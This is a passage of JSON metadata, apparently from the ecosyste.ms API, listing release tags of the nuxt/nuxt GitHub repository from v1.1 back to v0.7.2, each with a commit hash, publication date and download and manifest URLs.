cosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d